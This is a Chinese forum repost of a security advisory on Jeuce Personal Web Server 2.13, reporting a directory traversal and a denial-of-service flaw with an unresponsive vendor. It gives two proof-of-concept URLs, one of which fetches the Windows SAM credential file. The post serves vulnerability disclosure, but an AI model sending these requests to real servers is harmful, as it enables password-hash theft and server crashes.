发新话题
打印

[转载]Jeuce Personal Web Server Remote Flaw

[转载]Jeuce Personal Web Server Remote Flaw

信息来源:securitytracker.com

====================================
GSSIT - Global Security Solution IT
====================================
-------------------------------------------------------
Application: Jeuce Personal Web Server
Web Site: www.jeuce.com
Versions: 2.13
Platform: Windows
Bugs :
1) Directory Traversal
2) D.O.S


Credits:
########

#########################################
# == Ziv Kamir == #
# #
# GSSIT - Global Security Solution IT #
# #
# Web : www.gssit.co.il #
# #
# Email : gss_it@yahoo.com #
# #
#########################################

---------------------

1) Introduction
2) Bug
3) The Code
4) Fix


================
1) Introduction
================

The Jeuce Personal Web Server has helped thousands of people just like you to expand the use of their
computer in just minutes after downloading.
We've created the most user-friendly web server on the market so ANYONE can take advantage of the gre
at uses of the webserver.

=======
2) Bugs
=======

1) Directory Traversal


2) D.O.S


===========
3) The Code
===========


1) http://[Target]/../winnt/repair/sam



2) http://[Target]/://



======
4) Fix
======

Date of Vendor Notification:
----------------------------

15/12/04

Status:
-------

No Response.
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

发新话题